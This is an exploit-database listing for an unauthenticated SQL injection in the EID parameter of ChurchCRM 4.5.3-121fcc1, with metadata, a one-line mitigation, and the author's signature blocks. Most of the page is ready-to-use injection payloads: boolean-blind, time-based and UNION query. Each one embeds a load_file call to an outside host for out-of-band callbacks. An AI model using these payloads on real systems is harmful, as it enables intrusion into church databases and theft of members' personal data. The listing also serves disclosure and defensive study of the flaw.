header-logo
Suggest Exploit
vendor:
ChurchCRM
by:
nu11secur1ty
9
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: ChurchCRM
Affected Version From: 4.5.3-121fcc1
Affected Version To: 4.5.3-121fcc1
Patch Exists: YES
Related CWE:
CPE: a:churchcrm:churchcrm:4.5.3-121fcc1
Metasploit:
Other Scripts:
Platforms Tested:
2023

ChurchCRM v4.5.3-121fcc1 – SQL Injection

In the manual insertion point 1 - parameter `EID` appears to be vulnerable to SQL injection attacks. No need for cookies, no need admin authentication and etc. The attacker easily can steal information from this system by using this vulnerability.

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
## Author: nu11secur1ty
## Date: 02.27.2023
## Vendor: http://churchcrm.io/
## Software: https://github.com/ChurchCRM/CRM
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
In the manual insertion point 1 - parameter `EID` appears to be
vulnerable to SQL injection attacks.
No need for cookies, no need admin authentication and etc.
The attacker easily can steal information from this system by using
this vulnerability.

STATUS: HIGH Vulnerability - CRITICAL

[+]Payload:
```mysql
---
Parameter: EID (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
OR NOT 2407=2407

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)

    Type: UNION query
    Title: MySQL UNION query (UTF8) - 11 columns
    Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
UNION ALL SELECT
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1)

## Proof and Exploit:
[href](https://streamable.com/1eqhw2)

## Time spend:
01:00:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Navigation

Suggest Exploit

Services By CQR